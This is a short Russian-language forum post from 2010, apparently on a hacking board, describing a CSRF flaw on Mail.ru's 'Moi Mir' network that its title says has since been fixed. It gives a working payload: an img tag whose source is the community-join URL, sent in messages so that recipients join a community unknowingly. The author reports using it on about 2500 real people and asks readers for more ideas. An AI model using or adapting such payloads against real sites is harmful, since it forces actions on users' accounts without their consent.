15.04.2010, 14:06
|
|
Познающий
Регистрация: 13.04.2010
Сообщений: 42
Провел на форуме:
460968
Репутация:
81
|
|
CSRF на МОЙ МИР(УЖЕ ЗАКРЫЛИ =()
Можно подделать GET запрос вступления в сообщество
отправив в сообщении картинку:
Код:
<img src='http://my.mail.ru/community/wtfo_o/community-participate?participate=1&back=.gif' alt=""/>
без спама создал сообщество и в него вступили около 2500 человек.
Пример:
http://my.mail.ru/community/ilovemailru/
Паника:
http://my.mail.ru/community/shosse/5DB670B26D452A64.html
Просто из сообщества выйти бало весьма затруднительно
возможно есть другие идеи?
Последний раз редактировалось life_glider; 16.04.2010 в 19:25..
|
|
|